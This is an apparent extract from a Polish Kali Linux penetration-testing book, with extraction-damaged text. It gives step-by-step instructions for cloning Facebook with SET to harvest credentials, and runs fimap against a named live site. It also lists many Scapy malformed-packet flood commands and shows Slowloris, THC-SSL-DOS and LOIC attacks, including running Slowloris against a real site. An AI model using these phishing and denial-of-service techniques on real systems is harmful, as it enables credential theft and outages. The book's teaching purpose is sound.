Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
